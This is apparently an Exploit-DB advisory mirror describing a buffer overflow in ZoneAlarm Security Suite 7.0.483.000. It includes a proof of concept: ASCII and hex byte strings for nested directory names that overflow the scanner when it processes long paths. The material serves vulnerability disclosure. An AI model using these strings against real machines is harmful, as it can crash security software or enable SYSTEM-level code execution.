ZoneAlarm Security Suite Buffer Overflow Vulnerability

vendor:

ZoneAlarm Security Suite

by:

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: ZoneAlarm Security Suite

Affected Version From: ZoneAlarm Security Suite 7.0.483.000

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: a:zonealarm:zonealarm_security_suite:7.0.483.000

Metasploit:

Other Scripts:

Platforms Tested: Windows

ZoneAlarm Security Suite Buffer Overflow Vulnerability

ZoneAlarm Security Suite is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input when performing virus scans on long directory paths. Remote attackers may leverage this issue to execute arbitrary code with SYSTEM-level privileges and gain complete access to the vulnerable computer. Failed attacks will cause denial-of-service conditions.

Mitigation:

Apply the latest patches or updates provided by the vendor. Avoid opening files or scanning directories with long paths.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31124/info

ZoneAlarm Security Suite is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input when performing virus scans on long directory paths.

Remote attackers may leverage this issue to execute arbitrary code with SYSTEM-level privileges and gain complete access to the vulnerable computer. Failed attacks will cause denial-of-service conditions.

This issue affects ZoneAlarm Security Suite 7.0.483.000; other versions may also be affected. 

To demonstrate this issue, construct multiple nested subdirectories, naming the root directory string1 below, and each nested directory string2:

string1:
ASCII: ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? ? A ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41

string2:
ASCII: ???????????AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41